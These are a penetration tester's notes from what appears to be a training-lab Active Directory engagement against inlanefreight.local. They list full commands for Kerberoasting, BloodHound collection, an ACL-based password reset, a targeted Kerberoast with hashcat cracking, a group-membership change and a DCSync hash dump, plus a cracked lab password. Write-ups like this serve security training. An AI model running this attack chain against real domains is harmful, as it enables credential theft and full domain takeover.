# Nmap scans
- light > DC? ![[images/Pasted image 20260701202818.png]]
- create `ports.txt` ![[images/Pasted image 20260701202924.png]]
- detailed ![[images/Pasted image 20260701203212.png]]
# AS-REProasting Check
- nothing
```bash
nxc ldap 172.16.8.3 -u hporter -p password -d inlanefreight.local --asreproast asrep.out
```
![[images/Pasted image 20260702201901.png]]
# ADCS Check
- nothing
```bash
nxc ldap 172.16.8.3 -u hporter -p password -d inlanefreight.local -M adcs
```
![[images/Pasted image 20260702201618.png]]
# Kerberoasting Check
- errors with `nxc` but some hashes with `GetUserSPNs.py`
```bash
GetUserSPNs.py inlanefreight.local/hporter -dc-ip 172.16.8.3 -request -outputfile kerb.out
```
![[images/Pasted image 20260702202539.png]]
- are these even in scope? we haven't seen some of these machines ![[images/Pasted image 20260702202615.png]]
- double check the subnet ![[images/Pasted image 20260702202630.png]]
# Port 445 (SMB)
## enum as `hporter`
- shares ![[images/Pasted image 20260702154812.png]]
- `smbclient` ![[images/Pasted image 20260702155232.png]]
- all dirs are empty > come back when we have more creds
- `smbmap` ![[images/Pasted image 20260702155406.png]]
- grab `adum.vbs` > potential creds ![[images/Pasted image 20260702160029.png]]
- users > there's a lot!
- rid-brute > also a lot!
# Bloodhound
- run an ingestor
```bash
/opt/rusthound-ce -ns 172.16.8.3 -d inlanefreight.local -u hporter -p password -c All -z
sudo bloodhound-python -u 'hporter' -p password -d inlanefreight.local -dc dc01.inlanefreight.local -ns 172.16.8.3 -d inlanefreight.local -c all --zip
```
- `hporter` outbound object control ![[images/Pasted image 20260702203439.png]]
- `ssmalls` membership ![[images/Pasted image 20260702203511.png]]
- change password for `ssmalls`
```bash
bloodyad --host 172.16.8.3 -d inlanefreight.local -u hporter -p $password set password ssmalls password123
```
![[images/Pasted image 20260702205631.png]]
- maybe `ssmalls` has more access to `\Department Shares\IT` because he's in the `IT Admins` group?
- confirmed ![[images/Pasted image 20260702205925.png]]
- this script has creds for `backupadm`
- confirm creds
- confirmed smb access to DC01 and MS01
- no extra access to `Department Shares` on DC01 ![[images/Pasted image 20260702214935.png]]
```bash
smbmap -H 172.16.8.3 -u backupadm -p password -r 'Department Shares' --depth 3
```
- check winrm access
- no access to DC01; access to MS01
---
# DC01 Privesc
- `mssqladm` membership
![[images/Pasted image 20260703155747.png]]
- `mssqladm` abilities ![[images/Pasted image 20260703155940.png]]
- `server admins` can DCSYNC ![[images/Pasted image 20260703160009.png]]
## `ttimmons` targetedkerberoast
- use `mssqladm` `genericwrite` ACE over `ttimmons` to do a `targetkerberoast.py` of `ttimmons`
```bash
python3 targetedKerberoast.py -d inlanefreight.local -u mssqladm -p password --dc-ip 172.16.8.3 --request-user ttimmons | tee ttimmons.tgs.hash
```
![[images/Pasted image 20260703194914.png]]
- crack tgs for `ttimons`
```bash
hashcat -m 13100 ttimmons.tgs.hash /opt/rockyou.txt
```
![[images/Pasted image 20260703195347.png]]
## DCSync
- use `ttimmons` `genericall` ACE over `server admins` group to add `ttimmons` to the group
```bash
bloodyad -d inlanefreight.local -u ttimmons -p Repeat09 --host 172.16.8.3 add groupMember "Server Admins" ttimmons
bloodyad -d inlanefreight.local -u ttimmons -p Repeat09 --host 172.16.8.3 get object "Server Admins" --attr member #confirm
```
![[images/Pasted image 20260703195432.png]]![[images/Pasted image 20260703195441.png]]
- use `ttimmons` membership in `Server Admins` to perform a DCSync attack
```bash
secretsdump.py inlanefreight.local/
[email protected] -outputfile inlanefreight.hashes -just-dc
```
![[images/Pasted image 20260703200323.png]]
## Shell as `inlanefreight/administrator`
- cascade home dir ![[images/Pasted image 20260703200510.png]]
- networking
- `ipconfig` shows that DC01 is dual homed ![[images/Pasted image 20260703202106.png]]
- `arp -a` and `route print` ![[images/Pasted image 20260703202126.png]]
- check for flags
```powershell
Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue
```
![[images/Pasted image 20260703202529.png]]
- run `ping` for loop against 172.16.9.0/24
- taking way too long; do this again once we have our double pivot established
- try again > only one host this time
```powershell
1..254 | ForEach-Object { $ip = "172.16.9.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { Write-Output "$ip is UP" } }
1..100 | % {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"}
```
![[images/Pasted image 20260703205711.png]]
- cascade `\department shares` ![[images/Pasted image 20260703204810.png]]
- `id_rsa` for harry, james, and ssmallsadm